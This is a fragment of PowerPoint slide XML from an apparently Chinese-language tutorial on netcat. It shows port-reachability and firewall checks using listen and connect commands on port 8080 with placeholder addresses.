                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>u </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> x.x.x.x xx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="1305560"/>
            <a:ext cx="5105400" cy="3300095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>招数 1的场景是——已经有某个网络软件开启了监听端口，然后用 nc 测试端口是否可达。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　现在换另一个场景：  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　假设你正在配置防火墙规则，禁止 TCP 的 8080 端口对外监听。那么，你如何【验证】自己的配置是 OK 滴？  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　更进一步说：如果当前【没有】任何软件开启 8080 这个监听端口，你如何判断：该端口号是否会被防火墙阻拦？  </a:t>
            </a:r>
            <a:endParaRPr sz="14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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（网络诊断）判断防火墙是否 “允许 or 禁止” 某个端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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24205" y="2941955"/>
            <a:ext cx="7895590" cy="1929765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="3075305"/>
            <a:ext cx="7774305" cy="1673225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在 “主机 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>” 上运行 nc，让它连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="6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pc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的 8080 端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624298" y="1260670"/>
            <a:ext cx="7895406" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1262031"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745233" y="1854211"/>
            <a:ext cx="7774471" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在 “主机 S” 上运行 nc，让它在 8080 端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="1370330"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -lv -p 8080</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843530" y="4228465"/>
            <a:ext cx="4871085" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -w 3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> x.x.x.x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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flipH="1" flipV="1">
            <a:off x="2745652" y="0"/>
            <a:ext cx="6398348" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 8531131 w 8531131"/>
              <a:gd name="connsiteY0" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY1" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 8531131"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8531131"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 3660868 w 853113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31131" h="6858000">
                <a:moveTo>
                  <a:pt x="8531131" y="6858000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3660868" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660868"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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221416" y="-302892"/>
            <a:ext cx="692497" cy="2158334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" spc="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" spc="1125" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" spc="1125" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761858" y="555501"/>
            <a:ext cx="2210670" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300" spc="450" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3300" spc="450" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611363" y="1417956"/>
            <a:ext cx="3259304" cy="437515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是个啥玩意儿？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="225" dirty="0">
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611363" y="2140212"/>
            <a:ext cx="3259304" cy="437515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能干啥？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="225" dirty="0">
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="MH_Entry_1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
